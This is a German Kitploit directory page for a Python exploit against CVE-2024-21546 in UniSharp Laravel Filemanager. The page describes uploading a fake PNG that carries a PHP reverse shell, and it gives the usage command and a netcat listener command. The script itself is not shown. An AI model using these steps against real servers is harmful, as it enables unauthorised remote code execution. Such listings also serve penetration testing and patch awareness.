Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-21546 — Dieses Python-Exploit-Skript zielt auf einen verwundbaren Laravel Filemanager von UniSharp ab, der es authentifizierten Benutzern ermöglicht, Dateibeschränkungen zu umgehen und schädliche Dateien hochzuladen. Dies kann zu Remote Code Execution (RCE) führen, wenn die hochgeladene Payload ausgelöst wird. | Kitploit
Tools/GitHubGitHub/ajdumanhug/cve-2024-21546
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubajdumanhug/cve-2024-21546

CVE-2024-21546

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
511vor 1 JahrNoch nicht geprüft

Über

Dieses Python-Exploit-Skript zielt auf einen verwundbaren Laravel Filemanager von UniSharp ab, der es authentifizierten Benutzern ermöglicht, Dateibeschränkungen zu umgehen und schädliche Dateien hochzuladen. Dies kann zu Remote Code Execution (RCE) führen, wenn die hochgeladene Payload ausgelöst wird.

Teilen

CVE-2024-21546 Python-Exploit

🔥 Beschreibung

Dieses Python-Exploit-Skript zielt auf einen anfälligen Laravel Filemanager von UniSharp, der es authentifizierten Benutzern ermöglicht, Dateibeschränkungen zu umgehen und schädliche Dateien hochzuladen. Dies kann zu Remote Code Execution (RCE) führen, wenn die hochgeladene Payload ausgelöst wird.

Das Exploit führt Folgendes aus:

  • Validiert die vom Benutzer bereitgestellte laravel_session
  • Extrahiert das CSRF-_token per Regex
  • Lädt eine gefälschte PNG-Datei mit einer PHP-Reverse-Shell-Payload hoch
  • Löst die hochgeladene Datei aus

⚠️ Betroffene Versionen

Version 2.9.1 und frühere Versionen

⚙️ Verwendung

root@kitploit:~
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>

Wichtig: Starte deinen Listener, bevor du das Skript ausführst:

root@kitploit:~
nc -lvnp <listener_port>

💻 Beispielausführung

image

ℹ️ Referenzen

  • CVE-2024-21546
  • RCE per Upload-Shell auf Unisharp Laravel Filemanager
  • Commit 8170760
Tool herunterladen